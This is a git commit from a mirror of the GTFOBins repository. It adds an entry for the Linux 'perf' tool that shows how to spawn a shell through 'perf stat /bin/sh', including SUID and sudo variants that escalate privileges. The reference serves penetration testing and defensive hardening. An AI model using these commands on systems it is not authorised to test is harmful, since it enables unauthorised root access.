1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Kiran Ghimire 2021-10-27 01:33:59 +05:45 committed by GitHub
parent 04b2874819
commit a981bc1968
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

12
_gtfobins/perf.md Normal file
View File

@ -0,0 +1,12 @@
---
functions:
shell:
- code: |
perf stat /bin/sh
suid:
- code: |
./perf stat /bin/sh -p
sudo:
- code: |
sudo perf stat /bin/sh
---